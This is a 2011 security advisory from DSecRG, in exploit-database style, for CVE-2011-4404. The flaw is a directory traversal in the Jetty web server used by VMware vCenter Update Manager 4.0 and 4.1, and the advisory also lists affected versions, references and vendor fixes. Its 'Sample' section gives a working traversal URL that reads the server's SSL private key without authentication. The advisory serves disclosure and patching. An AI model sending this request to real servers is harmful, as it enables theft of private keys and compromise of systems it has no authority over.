# Exploit Title:VMware Update Manager Directory Traversal # Author: Alexey Sintsov # Software Link: http://www.vmware.com/ # Version:2.0.2 # Tested on: Windows 2003 / vCenter Update Manager 4.1 U1 # CVE : CVE-2011-4404 DSECRG-11-042 VMware Update Manager - Directory Traversal Application: VMware Update Manager Versions Affected: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4.0 prior to Update 4 Vendor URL: http://vmware.com Bugs: Directory Traversal File Read CVE: CVE-2011-4404 CVSS2: 7.8 Exploits: YES Reported: 06.06.2010 Vendor response: 06.06.2010 Date of Public Advisory: 18.11.2011 Authors: Alexey Sintsov Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com) Description ******** Directory Traversal vulnerability was found in Jetty web server that is used by VMware Update manager. Details ******* Directory Traversal vulnerability was found in Jetty web server that is used by VUM. With this vulnerability, an non-authenticated attacker can read any file on the server (with rights of the process). Sample ****** http://<target>:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key References ********** http://dsecrg.com/pages/vul/show.php?id=342 http://www.vmware.com/security/advisories/VMSA-2011-0014.html Fix Information ************* Vendor make fix for this issue: Fixed in Update Manager 5.0 Windows not affected Fixed in Update Manager 4.1 Windows Update 2 Fixed in Update Manager 4.0 Windows Update 4
0 条评论。